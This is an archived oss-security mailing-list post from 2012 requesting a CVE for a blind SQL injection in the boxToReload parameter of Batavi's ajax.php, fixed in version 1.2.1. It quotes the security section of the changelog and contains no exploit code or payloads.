Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Wed, 18 Jan 2012 14:31:19 +0100
From: Ronald van den Blink <oss-security@...urityview.nl>
To: oss-security@...ts.openwall.com
Subject: CVE request - Batavi 1.2.1 Fixes Blind SQL Injection vulnerability in boxToReload parameter of ajax.php

Hi,

Can we please have a CVE assigned for the following fix in Batavi 1.2.1 (http://sourceforge.net/projects/batavi/files/).

As pointed out by Canberk BOLAT of Mavituna Security, version before 1.2.1 have a Blind SQL Injection Vulnerability in the boxToReload parameter of ajax.php. This has been fixed in Batavi 1.2.1.

Relevant part of the changelog:

For details about the changes of the downloaded version you'll find a changes.txt in the root folder of the package.

Version 1.2.1

[..]

Security:

- Fixed SQL injection in modules;
- Improvements methods of Database to handle it;
- All data which come from user going via special check to strip all dangerous values.

[..]

With kind regards,

Ronald van den Blink
Project Manager 
Iceshop BV

Iceshop BV is the main contributor to the next generation open source e-commerce software Batavi. Batavi is the first open source e-commerce software that can easy handle more than 100.000 products and has native Icecat (www.icecat.biz) integration. 

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ